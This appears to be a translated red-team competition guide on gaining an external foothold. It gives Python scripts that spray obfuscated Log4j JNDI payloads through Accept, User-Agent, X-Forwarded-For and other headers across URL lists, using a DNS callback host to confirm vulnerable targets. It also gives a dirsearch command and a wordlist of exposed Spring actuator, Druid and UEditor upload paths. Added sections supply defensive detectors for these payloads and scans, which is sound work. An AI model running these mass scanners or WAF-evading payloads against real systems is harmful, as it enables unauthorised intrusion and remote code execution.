# Preface

The most important phase of a competition is gaining an external foothold: without a foothold on the perimeter you cannot get into the intranet, and everything else is wasted. As I recall, the hot vulnerabilities of the last few years have been Shiro 550, Spring Boot RCE and Log4j RCE. The first thing to do is scan the assets you were given for those vulnerabilities and get a foothold quickly. Of course, the major OA and financial systems also carry vulnerabilities of their own.
# Batch vulnerability scanning

## log4j

### fuzz spring
```python
import requests
import api.read_file   # the author's own helper module: returns one URL per line of the file
import urllib3
import hashlib

urllib3.disable_warnings()  # targets often use self-signed certificates; requests use verify=False

# FOFA-style query used to collect the Spring asset list (unused by this script)
q = b'icon_hash="116323821" && country="CN"'
url_list = api.read_file.get_url_list('url.txt')
hl = hashlib.md5()
for url in url_list:
    # the hash object is reused, so each digest covers every URL seen so far; its
    # first five hex characters label the DNS query so a callback can be matched to a URL
    hl.update(url.encode(encoding='utf-8'))
    print(url + '\t\t' + hl.hexdigest())
    dnslog = 'dnslog'  # placeholder for the DNS-logging domain
    accept = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}'
    header = {
        'Accept': accept
    }
    try:
        r = requests.get(url, headers=header, timeout=5, verify=False)
    except requests.exceptions.RequestException as e:
        print('请求出现异常')
```
### fuzz all headers
```python
import requests
import api.read_file   # the author's own helper module: returns one URL per line of the file
import urllib3
import hashlib

urllib3.disable_warnings()  # targets often use self-signed certificates; requests use verify=False

url_list = api.read_file.get_url_list('url.txt')
hl = hashlib.md5()
for url in url_list:
    # the hash object is reused, so each digest covers every URL seen so far; its
    # first five hex characters label the DNS query so a callback can be matched to a URL
    hl.update(url.encode(encoding='utf-8'))
    print(url + '\t\t' + hl.hexdigest())
    dnslog = 'dnslog'  # placeholder for the DNS-logging domain
    poc = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}'
    # each header name is prefixed to the same payload, so the DNS query also reveals which header was logged
    header = {
        'Accept': 'accept' + '.' + poc,
        'X-Client-IP': 'X-Client-IP' + '.' + poc,
        'X-Remote-IP': 'X-Remote-IP' + '.' + poc,
        'X-Remote-Addr': 'X-Remote-Addr' + '.' + poc,
        'X-Forwarded-For': 'X-Forwarded-For' + '.' + poc,
        'X-Originating-IP': 'X-Originating-IP' + '.' + poc,
        'User-Agent': 'User-Agent' + '.' + poc,
        'Referer': 'Referer' + '.' + poc,
        'Authorization': 'Authorization' + '.' + poc
    }
    try:
        r = requests.get(url, headers=header, timeout=5, verify=False)
    except requests.exceptions.RequestException as e:
        print('请求出现异常')
```
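The payloads above rely on Log4j lookup nesting (`${::-j}` is an empty lookup that falls back to the literal `j`) precisely so that a plain substring match on `jndi:` in a WAF or log search misses them. The check a defender wants is therefore a normaliser that unwinds those wrappers before matching. The script below is an added example, not code from the original post: it flattens the default-value form used above and, going one step beyond the post, the `${lower:x}`/`${upper:x}` case-conversion form, then reports which request headers carry a JNDI lookup. The sample request and the `attacker.invalid` host are constructed placeholders.

```python
import re

# Added example, not code from the original post: normalise the lookup-obfuscation
# tricks seen in the payloads above and flag JNDI lookups in request headers.

# ${lookup:key:-default} resolves to "default" when the lookup yields nothing,
# so ${::-j} is just the letter j. Only innermost (brace-free) occurrences match;
# the loop below repeats until nothing changes, so nesting unwinds inside-out.
DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# ${lower:x} / ${upper:x} wrap a single literal in a case-conversion lookup.
CASE_CONVERT = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
# After flattening, a lookup whose first component is jndi is the signal.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def flatten_lookups(value, max_rounds=20):
    """Strip default-value and case-conversion wrappers until a fixpoint is reached."""
    for _ in range(max_rounds):
        flat = DEFAULT_VALUE.sub(lambda m: m.group(1), value)
        flat = CASE_CONVERT.sub(lambda m: m.group(1).lower(), flat)
        if flat == value:
            break
        value = flat
    return value


def classify(value):
    """'jndi' for a JNDI lookup, 'lookup' for any other ${...} pattern, None if clean."""
    flat = flatten_lookups(value)
    if JNDI_LOOKUP.search(flat):
        return "jndi"
    if "${" in flat:
        return "lookup"
    return None


def scan_headers(headers):
    """Return {header name: verdict} for every header value that carries a lookup."""
    findings = {}
    for name, value in headers.items():
        verdict = classify(value)
        if verdict:
            findings[name] = verdict
    return findings


# Constructed sample request; attacker.invalid and app.example.invalid are placeholders.
SAMPLE_REQUEST = {
    "Host": "app.example.invalid",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/102.0",
    "Accept": "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker.invalid/a}",
    "X-Forwarded-For": "${${lower:j}ndi:ldap://attacker.invalid/b}",
    "Referer": "https://app.example.invalid/login",
    "X-Trace": "${env:HOSTNAME}",
}

if __name__ == "__main__":
    for name, verdict in scan_headers(SAMPLE_REQUEST).items():
        print(f"{verdict:6} {name}: {flatten_lookups(SAMPLE_REQUEST[name])}")
```

Run it over every header of an inbound request (or over the header fields of a reverse-proxy access log) rather than just `User-Agent`; the second script above shows why, since any logged header is a candidate. The normaliser only handles the two wrapper forms named here, so treat any leftover `${` as worth a look even when it does not flatten to `jndi`.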
## shiro

The most efficient approach is simply to route all traffic through Burp Suite or xray once.
## telnet with no password

webfinder-3.2 can scan for telnet default passwords.
## dirsearch batch scanning with a custom wordlist

```shell
python ..py -w D:.txt -l "C:.txt" -p socks5://127.0.0.1:7772
```
```text
/actuator/env
/admin/v2/api-docs
/api/actuator/env
/api/druid/index.html
/api/env
/api/v1/api-docs
/api/v2/api-docs
/api/v3/api-docs
/druid/index.html
/env
/nacos/
/service
/Service.asmx?wsdl
/statics/ueditor/php/controller.php?action=uploadfile
/swagger-ui.html
/swagger/v1/swagger.json
/UEditor/asp/controller.asp?action=uploadfile
/ueditor/php/controller.php?action=uploadfile
/v1/api-docs
/v2/api-docs
/v3/api-docs
```
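Once a wordlist like this is in circulation, the defender's side of it is twofold: know whether any of these endpoints actually answer on your own servers, and notice when someone walks the list against you. The script below is an added example, not code from the original post. It parses Apache/nginx combined-format access lines, matches the request path (case-folded, query string and trailing slash dropped) against the entries above, reports which sensitive endpoints returned 200, and flags any source that produced a burst of distinct 404s, which is what a wordlist scan looks like from the server side. The log lines, the threshold of five and the documentation addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Added example, not code from the original post: spot requests for the
# sensitive endpoints in the wordlist above in combined-format access logs,
# and flag sources whose burst of distinct 404s looks like a directory brute-force.

WORDLIST = [
    "/actuator/env", "/admin/v2/api-docs", "/api/actuator/env", "/api/druid/index.html",
    "/api/env", "/api/v1/api-docs", "/api/v2/api-docs", "/api/v3/api-docs",
    "/druid/index.html", "/env", "/nacos/", "/service", "/Service.asmx?wsdl",
    "/statics/ueditor/php/controller.php?action=uploadfile", "/swagger-ui.html",
    "/swagger/v1/swagger.json", "/UEditor/asp/controller.asp?action=uploadfile",
    "/ueditor/php/controller.php?action=uploadfile", "/v1/api-docs", "/v2/api-docs",
    "/v3/api-docs",
]


def norm(target):
    """Case-fold the path and drop the query string and trailing slashes."""
    return urlsplit(target).path.lower().rstrip("/") or "/"


SENSITIVE = {norm(p) for p in WORDLIST}

# Apache/nginx combined log format; only the fields we need are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return (ip, normalised path, status) or None for a line that does not parse."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    return m.group("ip"), norm(m.group("target")), int(m.group("status"))


def analyse(lines, burst_threshold=5):
    hits = []                      # (ip, path, status) for requests to sensitive endpoints
    not_found = defaultdict(set)   # ip -> distinct paths that returned 404
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status = rec
        if path in SENSITIVE:
            hits.append((ip, path, status))
        if status == 404:
            not_found[ip].add(path)
    return {
        "hits": hits,
        # sources probing many distinct missing paths: the signature of a wordlist scan
        "scanners": sorted(ip for ip, paths in not_found.items() if len(paths) >= burst_threshold),
        # sensitive endpoints that actually answered 200 need hardening, not just an alert
        "exposed": sorted({path for _, path, status in hits if status == 200}),
    }


# Constructed sample log; 203.0.113.7 and 198.51.100.2 are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0800] "GET /actuator/env HTTP/1.1" 200 5123 "-" "python-requests/2.28"
203.0.113.7 - - [10/Oct/2023:13:55:36 +0800] "GET /druid/index.html HTTP/1.1" 404 153 "-" "python-requests/2.28"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0800] "GET /v2/api-docs?group=x HTTP/1.1" 404 153 "-" "python-requests/2.28"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0800] "GET /nacos/ HTTP/1.1" 404 153 "-" "python-requests/2.28"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0800] "GET /Service.asmx?wsdl HTTP/1.1" 404 153 "-" "python-requests/2.28"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0800] "GET /UEditor/asp/controller.asp?action=uploadfile HTTP/1.1" 404 153 "-" "python-requests/2.28"
198.51.100.2 - - [10/Oct/2023:13:56:01 +0800] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2023:13:56:02 +0800] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0"
garbage line that does not parse
""".splitlines()

if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    print("exposed endpoints:", result["exposed"])
    print("scanning sources:", result["scanners"])
```

The `exposed` list is the actionable part: an `/actuator/env` that answers 200 to an unauthenticated client should be closed off regardless of whether anyone has scanned for it yet. The 404-burst heuristic is deliberately coarse; tune the threshold to your traffic and pair it with the time window your log pipeline already provides.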
## xray multi-process scanning
```python
import os
import time
import random
import string
import subprocess

file_path = '../asset/out'   # directory holding one URL-list file per batch
for filename in os.listdir(file_path):
    t = time.time()
    # unique report name: unix timestamp plus five random alphanumerics
    html_filename = str(int(t)) + "".join(random.sample(string.ascii_letters + string.digits, 5)) + '.html'
    # os.listdir() returns bare names, so join with the directory or xray will not find the file
    url_file = os.path.join(file_path, filename)
    cmd = ['xray', 'ws', '--url-file', url_file, '--html-output', html_filename]
    # one xray process per file, each in its own console window (CREATE_NEW_CONSOLE is Windows-only)
    subprocess.Popen(cmd, creationflags=subprocess.CREATE_NEW_CONSOLE)
```